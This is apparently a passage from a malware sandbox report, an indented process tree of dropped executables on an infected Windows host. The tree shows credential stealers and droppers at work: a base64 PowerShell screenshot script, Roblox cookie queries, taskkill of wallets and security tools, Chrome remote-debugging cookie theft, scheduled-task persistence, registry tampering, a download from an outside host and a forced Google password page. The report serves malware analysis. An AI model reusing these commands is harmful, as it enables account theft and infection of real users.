AaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=6⤵PID:1192
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\k4k342c1\k4k342c1.cmdline"7⤵PID:5196
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6102.tmp" "c:\Users\Admin\appdata\Local\Temp\k4k342c1\CSC939CD9FEBE3C46D9987C24652FB8B555.TMP"8⤵PID:2884
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe" /v DisplayIcon"5⤵PID:5704
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe" /v DisplayIcon6⤵PID:1624
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:3212
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:4360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"5⤵PID:4672
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts6⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:836
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"5⤵PID:3432
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts6⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:1952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:1908
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:5612
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5612 -s 1447⤵PID:5728
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:2828
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
PID:2668
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:5860
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:3360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:2448
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:5200
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:3348
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:2564
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"5⤵PID:4272
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵
- Command and Scripting Interpreter: PowerShell
PID:3288
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"5⤵PID:1004
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵PID:4440
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI41962\rar.exe a -r -hphai1723ontop "C:\Users\Admin\AppData\Local\Temp\t0TYM.zip" *"5⤵PID:456
-
C:\Users\Admin\AppData\Local\Temp\_MEI41962\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI41962\rar.exe a -r -hphai1723ontop "C:\Users\Admin\AppData\Local\Temp\t0TYM.zip" *6⤵
- Executes dropped EXE
PID:4316
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"5⤵PID:2076
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption6⤵PID:5016
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"5⤵PID:3528
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory6⤵PID:2796
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵PID:3364
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵PID:2004
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\bundle.exe"C:\Users\Admin\AppData\Local\Temp\Files\bundle.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:3952
-
-
C:\Users\Admin\AppData\Local\Temp\Files\bot2.exe"C:\Users\Admin\AppData\Local\Temp\Files\bot2.exe"3⤵
- Executes dropped EXE
PID:4360 -
C:\Users\Admin\AppData\Local\Temp\Files\bot2.exe"C:\Users\Admin\AppData\Local\Temp\Files\bot2.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3976 -
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM ArmoryQt.exe5⤵
- Kills process with taskkill
PID:5124
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM "Atomic Wallet.exe"5⤵
- Kills process with taskkill
PID:1116 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:1004
-
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM bytecoin-gui.exe5⤵
- Kills process with taskkill
PID:4600
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM Coinomi.exe5⤵
- Kills process with taskkill
PID:4956
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM Element.exe5⤵
- Kills process with taskkill
PID:2908
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM Exodus.exe5⤵
- Kills process with taskkill
PID:5672
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM Guarda.exe5⤵
- Kills process with taskkill
PID:2416
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM KeePassXC.exe5⤵
- Kills process with taskkill
PID:5028
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM NordVPN.exe5⤵
- Kills process with taskkill
PID:3420
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM OpenVPNConnect.exe5⤵
- Kills process with taskkill
PID:3452
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM seamonkey.exe5⤵
- Kills process with taskkill
PID:5908
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM Signal.exe5⤵
- Kills process with taskkill
PID:4420
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM filezilla.exe5⤵
- Kills process with taskkill
PID:1012
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM filezilla-server-gui.exe5⤵
- Kills process with taskkill
PID:5812
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM keepassxc-proxy.exe5⤵
- Kills process with taskkill
PID:2020
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM nordvpn-service.exe5⤵
- Kills process with taskkill
PID:4596
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM steam.exe5⤵
- Kills process with taskkill
PID:1164
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM walletd.exe5⤵
- Kills process with taskkill
PID:2828
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM waterfox.exe5⤵
- Kills process with taskkill
PID:5412
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM Discord.exe5⤵
- Kills process with taskkill
PID:3820
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM DiscordCanary.exe5⤵
- Kills process with taskkill
PID:1000
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM burp.exe5⤵
- Kills process with taskkill
PID:3628
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM Ethereal.exe5⤵
- Kills process with taskkill
PID:4044
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM EtherApe.exe5⤵
- Kills process with taskkill
PID:4580
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM fiddler.exe5⤵
- Kills process with taskkill
PID:5240
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM HTTPDebuggerSvc.exe5⤵
- Kills process with taskkill
PID:1740
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM HTTPDebuggerUI.exe5⤵
- Kills process with taskkill
PID:3652 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4316
-
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM snpa.exe5⤵
- Kills process with taskkill
PID:4332 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5016
-
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM solarwinds.exe5⤵
- Kills process with taskkill
PID:3080
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM tcpdump.exe5⤵
- Kills process with taskkill
PID:3292
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM telerik.exe5⤵
- Kills process with taskkill
PID:5828 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:456
-
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM wireshark.exe5⤵
- Kills process with taskkill
PID:4488
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM winpcap.exe5⤵
- Kills process with taskkill
PID:4632
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM telegram.exe5⤵
- Kills process with taskkill
PID:884 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:2004
-
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM chrome.exe5⤵
- Kills process with taskkill
PID:760
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM chrome.exe5⤵
- Kills process with taskkill
PID:3508
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
PID:3680 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf4,0xf8,0xfc,0xd0,0x100,0x7fff2430cc40,0x7fff2430cc4c,0x7fff2430cc586⤵PID:5256
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=1952,i,3880340073250726528,15326183536585769892,262144 --variations-seed-version --mojo-platform-channel-handle=1928 /prefetch:26⤵PID:1312
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --no-appcompat-clear --field-trial-handle=1956,i,3880340073250726528,15326183536585769892,262144 --variations-seed-version --mojo-platform-channel-handle=1980 /prefetch:36⤵
- Drops file in Program Files directory
PID:5348
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --no-appcompat-clear --field-trial-handle=2072,i,3880340073250726528,15326183536585769892,262144 --variations-seed-version --mojo-platform-channel-handle=2084 /prefetch:86⤵PID:2440
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2908,i,3880340073250726528,15326183536585769892,262144 --variations-seed-version --mojo-platform-channel-handle=2916 /prefetch:16⤵
- Uses browser remote debugging
- Drops file in Program Files directory
PID:1500
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3040,i,3880340073250726528,15326183536585769892,262144 --variations-seed-version --mojo-platform-channel-handle=3060 /prefetch:16⤵
- Uses browser remote debugging
- Drops file in Program Files directory
PID:4804
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\pimer_bbbcontents7.exe"C:\Users\Admin\AppData\Local\Temp\Files\pimer_bbbcontents7.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3136 -
C:\Users\Admin\AppData\Local\Temp\Files\pimer_bbbcontents7.exe"C:\Users\Admin\AppData\Local\Temp\Files\pimer_bbbcontents7.exe"4⤵
- Executes dropped EXE
PID:3668
-
-
C:\Users\Admin\AppData\Local\Temp\Files\pimer_bbbcontents7.exe"C:\Users\Admin\AppData\Local\Temp\Files\pimer_bbbcontents7.exe"4⤵
- Executes dropped EXE
PID:2492
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Discord.exe"C:\Users\Admin\AppData\Local\Temp\Files\Discord.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3416 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"' & exit4⤵
- System Location Discovery: System Language Discovery
PID:4660 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"'5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5272
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp3574.tmp.bat""4⤵
- System Location Discovery: System Language Discovery
PID:5176 -
C:\Windows\SysWOW64\timeout.exetimeout 35⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5392
-
-
C:\Users\Admin\AppData\Roaming\Discord.exe"C:\Users\Admin\AppData\Roaming\Discord.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3696
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ASUFER.exe"C:\Users\Admin\AppData\Local\Temp\Files\ASUFER.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:6056 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\windows\ehome\SER.bat" "4⤵
- System Location Discovery: System Language Discovery
PID:5444 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ipz.exe5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:2708
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ipz2.exe5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:4596
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nvidsrv.exe5⤵
- Kills process with taskkill
PID:3508
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im safesurf.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:3668
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im surfguard.exe5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:4616
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "UseWUServer" /t REG_DWORD /d "0" /f5⤵
- System Location Discovery: System Language Discovery
PID:4440
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmisrv.exe" /f5⤵
- System Location Discovery: System Language Discovery
PID:5132
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmsdll.exe" /f5⤵
- System Location Discovery: System Language Discovery
PID:4188
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\amsql.exe" /f5⤵
- System Location Discovery: System Language Discovery
PID:2760
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\slscv.exe" /f5⤵
- System Location Discovery: System Language Discovery
PID:3308
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fturl.exe" /f5⤵
- System Location Discovery: System Language Discovery
PID:5552
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wdgmgr.exe" /f5⤵
- System Location Discovery: System Language Discovery
PID:2756
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ams.exe" /f5⤵
- System Location Discovery: System Language Discovery
PID:4244
-
-
C:\Windows\SysWOW64\reg.exereg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ratings /f5⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5972
-
-
C:\Windows\SysWOW64\subin.exesubin /subkeyreg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\xStarter /deny=SYSTEM=F5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3140
-
-
C:\Windows\SysWOW64\subin.exesubin /subkeyreg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ProgramService /deny=SYSTEM=F5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5868
-
-
C:\Windows\SysWOW64\subin.exesubin /subkeyreg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ddns /deny=SYSTEM=F5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6140
-
-
C:\windows\ehome\sc.exesc stop xStarter5⤵
- Executes dropped EXE
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:5440
-
-
C:\Windows\SysWOW64\subin.exesubin /subkeyreg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Bios /deny=SYSTEM=F5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1948
-
-
C:\windows\ehome\wmild.exewmild.exe -c http://openslowmo.com/img/icons/SURFSET.exe --no-check-certificate5⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:5104
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\newtpp.exe"C:\Users\Admin\AppData\Local\Temp\Files\newtpp.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3700
-
-
C:\Users\Admin\AppData\Local\Temp\Files\random.exe"C:\Users\Admin\AppData\Local\Temp\Files\random.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2292 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:4532
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:5072
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:5872
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:3992
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:2216
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:5828
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4956 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2060 -parentBuildID 20240401114208 -prefsHandle 1944 -prefMapHandle 1416 -prefsLen 21257 -prefMapSize 243020 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ba54894a-8bbd-446f-9d05-7c5ecfcff001} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" gpu6⤵PID:5608
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2428 -parentBuildID 20240401114208 -prefsHandle 2420 -prefMapHandle 2416 -prefsLen 21257 -prefMapSize 243020 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2643bc77-b219-4d4f-9ada-0312100c2828} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" socket6⤵PID:384
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3340 -childID 1 -isForBrowser -prefsHandle 3304 -prefMapHandle 3300 -prefsLen 22482 -prefMapSize 243020 -jsInitHandle 1352 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4a333c28-4786-4dc1-a763-0ff435585b85} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" tab6⤵PID:2812
-
-
